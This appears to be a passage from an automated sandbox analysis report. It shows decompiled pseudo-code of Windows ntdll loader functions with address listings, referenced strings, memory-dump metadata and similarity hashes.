							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x5438464; // 0x73b80110
					 *0x543b1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E05379B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x5435780 & 0x00000005) != 0) {
						_push(_t49);
						E053C5510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}




















                                      0x05378e0f
                                      0x05378e16
                                      0x05378e19
                                      0x05378e1b
                                      0x05378e21
                                      0x05378e7f
                                      0x05378e85
                                      0x053b9354
                                      0x053b936c
                                      0x053b9371
                                      0x053b937b
                                      0x053b9381
                                      0x053b9381
                                      0x053b937b
                                      0x05378e9d
                                      0x05378e9d
                                      0x05378e29
                                      0x05378e2c
                                      0x05378e38
                                      0x05378e3e
                                      0x05378e43
                                      0x05378eb5
                                      0x05378eb9
                                      0x053b92aa
                                      0x053b92af
                                      0x053b92e8
                                      0x053b92e8
                                      0x053b92af
                                      0x05378eb9
                                      0x05378e45
                                      0x05378e53
                                      0x05378e5b
                                      0x05378e5f
                                      0x05378e78
                                      0x05378e78
                                      0x05378e7d
                                      0x05378ec3
                                      0x05378ecd
                                      0x05378ed2
                                      0x05378ed2
                                      0x05378ec5
                                      0x05378ec5
                                      0x00000000
                                      0x05378e7d
                                      0x05378e67
                                      0x05378ea4
                                      0x053b931a
                                      0x00000000
                                      0x00000000
                                      0x053b9320
                                      0x05378ea4
                                      0x05378e70
                                      0x053b9325
                                      0x053b9340
                                      0x053b9345
                                      0x053b9345
                                      0x05378e76
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000

                                      Strings
                                      • LdrpFindDllActivationContext, xrefs: 053B9331, 053B935D
                                      • Querying the active activation context failed with status 0x%08lx, xrefs: 053B9357
                                      • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 053B932A
                                      • minkernel\ntdll\ldrsnap.c, xrefs: 053B933B, 053B9367
                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                      • API String ID: 0-3779518884
                                      • Opcode ID: cf105ee6b6a841f8902838128b5cb30416fb099a9c8ee6ef6d5b39bbc1ba393b
                                      • Instruction ID: 1a39909a145f85c3e73a85f9c6baec5575628ed72b1465265eb9cc2a1a42d699
                                      • Opcode Fuzzy Hash: cf105ee6b6a841f8902838128b5cb30416fb099a9c8ee6ef6d5b39bbc1ba393b
                                      • Instruction Fuzzy Hash: DC410932E0431D9EDB35AA18C88EFB6F7A6BB04644F054569F90997D50EBF8AD80C781
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 05358794, Relevance: 4.0, Strings: 3, Instructions: 255COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 83%
                                      			E05358794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E0535934A() != 0) {
								_t159 = E053CA9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0x5435780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E053C5510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0x5435780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E0535849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E05358999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E05358999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0x5435c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0x5435c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E05362280(_t92, 0x54386cc);
															_t94 = E05419DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E053761A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0x5435c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E05358A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0x5435c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0x5435c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E0538F380(_t136, 0x5321184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E05362280(_t108, 0x54386cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E053761A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E05419D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E0535FFB0(_t118, _t156, 0x54386cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E05389A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}












































                                      0x05358799
                                      0x0535879d
                                      0x053587a1
                                      0x053587a3
                                      0x053587a8
                                      0x053587c3
                                      0x053587c3
                                      0x053587c8
                                      0x053587d1
                                      0x053587d4
                                      0x053587d8
                                      0x053587e5
                                      0x053587ec
                                      0x053a9bfe
                                      0x053a9c00
                                      0x053a9c02
                                      0x053a9c08
                                      0x053a9c0d
                                      0x053a9c0f
                                      0x053a9c14
                                      0x053a9c2d
                                      0x053a9c32
                                      0x053a9c37
                                      0x053a9c3a
                                      0x053a9c3c
                                      0x053a9c42
                                      0x053a9c42
                                      0x053a9c3c
                                      0x053a9c02
                                      0x053587da
                                      0x053587df
                                      0x053587e3
                                      0x00000000
                                      0x00000000
                                      0x053587e3
                                      0x053587f2
                                      0x00000000
                                      0x053587fb
                                      0x053587fd
                                      0x053587fe
                                      0x0535880e
                                      0x0535880f
                                      0x05358810
                                      0x05358814
                                      0x0535881a
                                      0x0535881c
                                      0x0535881f
                                      0x05358821
                                      0x05358822
                                      0x05358824
                                      0x05358826
                                      0x0535882c
                                      0x0535882e
                                      0x053a9c48
                                      0x053a9c48
                                      0x05358834
                                      0x05358834
                                      0x05358837
                                      0x00000000
                                      0x00000000
                                      0x05358837
                                      0x0535882e
                                      0x0535883d
                                      0x05358840
                                      0x05358843
                                      0x05358846
                                      0x05358849
                                      0x0535884c
                                      0x0535884e
                                      0x05358850
                                      0x05358852
                                      0x05358854
                                      0x05358857
                                      0x053588b4
                                      0x053588b6
                                      0x053588b6
                                      0x05358859
                                      0x05358859
                                      0x05358859
                                      0x05358861
                                      0x05358866
                                      0x0535886a
                                      0x0535893d
                                      0x05358941
                                      0x00000000
                                      0x05358947
                                      0x05358947
                                      0x0535894a
                                      0x0535894c
                                      0x00000000
                                      0x05358952
                                      0x05358955
                                      0x0535895a
                                      0x0535895d
                                      0x0535895d
                                      0x0535895f
                                      0x05358961
                                      0x05358961
                                      0x05358968
                                      0x00000000
                                      0x00000000
                                      0x0535896a
                                      0x0535896b
                                      0x0535896e
                                      0x00000000
                                      0x05358970
                                      0x05358970
                                      0x05358970
                                      0x05358970
                                      0x05358972
                                      0x05358972
                                      0x05358974
                                      0x00000000
                                      0x0535897a
                                      0x0535897a
                                      0x0535897d
                                      0x00000000
                                      0x05358983
                                      0x053a9c65
                                      0x053a9c6d
                                      0x053a9c72
                                      0x053a9c75
                                      0x053a9c75
                                      0x053a9c82
                                      0x053a9c86
                                      0x053a9c87
                                      0x053a9c88
                                      0x053a9c89
                                      0x053a9c8c
                                      0x053a9c90
                                      0x053a9c95
                                      0x053a9c97
                                      0x053a9ca0
                                      0x053a9ca3
                                      0x053a9ca9
                                      0x053a9ca9
                                      0x00000000
                                      0x053a9ca9
                                      0x053a9ca3
                                      0x00000000
                                      0x053a9c97
                                      0x0535897d
                                      0x00000000
                                      0x05358974
                                      0x05358988
                                      0x05358992
                                      0x05358996
                                      0x00000000
                                      0x05358996
                                      0x0535894c
                                      0x00000000
                                      0x05358870
                                      0x0535887b
                                      0x0535887d
                                      0x0535887f
                                      0x05358881
                                      0x05358884
                                      0x05358884
                                      0x05358886
                                      0x05358889
                                      0x0535888c
                                      0x0535888e
                                      0x05358891
                                      0x05358891
                                      0x05358898
                                      0x00000000
                                      0x00000000
                                      0x0535889a
                                      0x0535889b
                                      0x0535889e
                                      0x00000000
                                      0x00000000
                                      0x053588a0
                                      0x053588a8
                                      0x053588b0
                                      0x053588b2
                                      0x053588d3
                                      0x053588d5
                                      0x00000000
                                      0x053588d7
                                      0x053588db
                                      0x053588dc
                                      0x053588e0
                                      0x053588e8
                                      0x053588ee
                                      0x053588f0
                                      0x053588f3
                                      0x053588fc
                                      0x05358901
                                      0x05358906
                                      0x0535890c
                                      0x0535890c
                                      0x0535890f
                                      0x05358916
                                      0x05358917
                                      0x05358918
                                      0x05358919
                                      0x0535891a
                                      0x0535891f
                                      0x05358921
                                      0x053a9c52
                                      0x053a9c55
                                      0x053a9c5b
                                      0x053a9cac
                                      0x053a9cc0
                                      0x053a9cc0
                                      0x053a9c55
                                      0x05358927
                                      0x05358927
                                      0x0535892f
                                      0x05358933
                                      0x00000000
                                      0x053588f5
                                      0x053588f5
                                      0x00000000
                                      0x053588f7
                                      0x053588f7
                                      0x053588fa
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x053588fa
                                      0x053588f5
                                      0x053588f3
                                      0x00000000
                                      0x053588d5
                                      0x00000000
                                      0x053588b2
                                      0x053588c9
                                      0x00000000
                                      0x053588c9
                                      0x0535887f
                                      0x0535886a
                                      0x05358857
                                      0x05358852
                                      0x053588bf
                                      0x053588bf
                                      0x053587aa
                                      0x053587ad
                                      0x053587ae
                                      0x053587b4
                                      0x053587b5
                                      0x053587b6
                                      0x053587b8
                                      0x053587bd
                                      0x053587c1
                                      0x053587f4
                                      0x053587fa
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x053587c1
                                      0x00000000

                                      Strings
                                      • LdrpDoPostSnapWork, xrefs: 053A9C1E
                                      • minkernel\ntdll\ldrsnap.c, xrefs: 053A9C28
                                      • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 053A9C18
                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                      • API String ID: 0-1948996284
                                      • Opcode ID: e91082daadac917dc7dfe48d25311cce3cde5335b9f340bbc7a79f758153279c
                                      • Instruction ID: 25efcc7047afd428a0e06fc4b3d5d24ec8c8641f0a9ffe6ebb9386052fa91c47
                                      • Opcode Fuzzy Hash: e91082daadac917dc7dfe48d25311cce3cde5335b9f340bbc7a79f758153279c
                                      • Instruction Fuzzy Hash: C491F132A04616EBDB19DF58C885EBAF7B6FF44320F245069EC06AB250DB70ED01CB90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 05357E41, Relevance: 3.9, Strings: 3, Instructions: 174COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 98%
                                      			E05357E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E0535CEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E0534C9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x5435780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E053C5510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x5435780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E05367D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E05367D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E053C7016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E05367D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E05367D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E053C7016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E0537A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E0534B1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}




















                                      0x05357e4c
                                      0x05357e50
                                      0x05357e55
                                      0x05357e58
                                      0x05357e5d
                                      0x05357e71
                                      0x05357f33
                                      0x05357e77
                                      0x05357e77
                                      0x05357e79
                                      0x05357e79
                                      0x05357e7e
                                      0x05357f45
                                      0x053a9848
                                      0x00000000
                                      0x053a9848
                                      0x05357f4e
                                      0x05357f53
                                      0x05357f5a
                                      0x00000000
                                      0x00000000
                                      0x053a985a
                                      0x053a9862
                                      0x053a9866
                                      0x00000000
                                      0x053a986c
                                      0x00000000
                                      0x053a986c
                                      0x05357e84
                                      0x05357e84
                                      0x05357e8d
                                      0x053a9871
                                      0x05357eb8
                                      0x05357ec0
                                      0x05357ec0
                                      0x05357e9a
                                      0x053a987e
                                      0x00000000
                                      0x00000000
                                      0x053a9884
                                      0x053a988b
                                      0x053a98a7
                                      0x053a98ac
                                      0x053a98b1
                                      0x053a98b6
                                      0x053a98b8
                                      0x053a98b8
                                      0x053a98b9
                                      0x00000000
                                      0x053a98b9
                                      0x05357ea0
                                      0x05357ea7
                                      0x00000000
                                      0x00000000
                                      0x05357eac
                                      0x05357eb1
                                      0x05357ec6
                                      0x05357ed0
                                      0x053a98cc
                                      0x05357ed6
                                      0x05357ed6
                                      0x05357ed6
                                      0x05357ede
                                      0x05357ee3
                                      0x053a98e3
                                      0x053a98f0
                                      0x053a9902
                                      0x053a98f2
                                      0x053a98fb
                                      0x053a98fb
                                      0x053a9907
                                      0x053a991d
                                      0x053a991d
                                      0x053a9907
                                      0x053a98e3
                                      0x05357ef0
                                      0x05357f14
                                      0x05357f14
                                      0x05357f1e
                                      0x053a9946
                                      0x05357f24
                                      0x05357f24
                                      0x05357f24
                                      0x05357f2c
                                      0x053a996a
                                      0x053a9975
                                      0x053a9975
                                      0x053a997e
                                      0x053a9993
                                      0x053a9993
                                      0x053a997e
                                      0x00000000
                                      0x05357ef2
                                      0x05357efc
                                      0x05357f0a
                                      0x05357f0e
                                      0x053a9933
                                      0x00000000
                                      0x053a9933
                                      0x00000000
                                      0x05357f0e
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x05357eb1

                                      Strings
                                      • minkernel\ntdll\ldrmap.c, xrefs: 053A98A2
                                      • Could not validate the crypto signature for DLL %wZ, xrefs: 053A9891
                                      • LdrpCompleteMapModule, xrefs: 053A9898
                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                      • API String ID: 0-1676968949
                                      • Opcode ID: d4d464a4f78697259a4676e1c04378ec3fc4f045cd7dee6141070bce755759e0
                                      • Instruction ID: 07deb3069b6a9b496ef901846d340fd9172448d37b8f83924c20d318155115ab
                                      • Opcode Fuzzy Hash: d4d464a4f78697259a4676e1c04378ec3fc4f045cd7dee6141070bce755759e0
                                      • Instruction Fuzzy Hash: F45104326047449BDB29CB58C948F6A7BE9FF013A4F0415A9EC52AB7D1D7B4ED00CB50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0534E620, Relevance: 3.9, Strings: 3, Instructions: 165COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 93%
                                      			E0534E620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E0534F358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E053895D0();
						}
						if(_t78 != 0) {
							L053677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E0538FA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E0538BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E05389600();
					if(_t97 < 0) {
						goto L6;
					}
					E0538BB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L0534F018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E0538BB40(_t83, _t102 + 0x24, _t78);
								if(L053543C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E0538BB40(_t84, _t102 + 0x24, _t94);
									if(L053543C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}































                                      0x0534e620
                                      0x0534e628
                                      0x0534e62f
                                      0x0534e631
                                      0x0534e635
                                      0x0534e637
                                      0x0534e63e
                                      0x053a5503
                                      0x053a5503
                                      0x0534e64c
                                      0x0534e64c
                                      0x0534e651
                                      0x00000000
                                      0x00000000
                                      0x0534e661
                                      0x0534e665
                                      0x053a542a
                                      0x0534e715
                                      0x0534e71a
                                      0x0534e71c
                                      0x0534e720
                                      0x0534e720
                                      0x0534e727
                                      0x0534e736
                                      0x0534e736
                                      0x0534e743
                                      0x0534e743
                                      0x0534e673
                                      0x0534e678
                                      0x0534e67d
                                      0x0534e682
                                      0x0534e685
                                      0x0534e692
                                      0x0534e69b
                                      0x0534e6a3
                                      0x0534e6ad
                                      0x0534e6b1
                                      0x0534e6b2
                                      0x0534e6bb
                                      0x0534e6bf
                                      0x0534e6c0
                                      0x0534e6c8
                                      0x0534e6cc
                                      0x0534e6d5
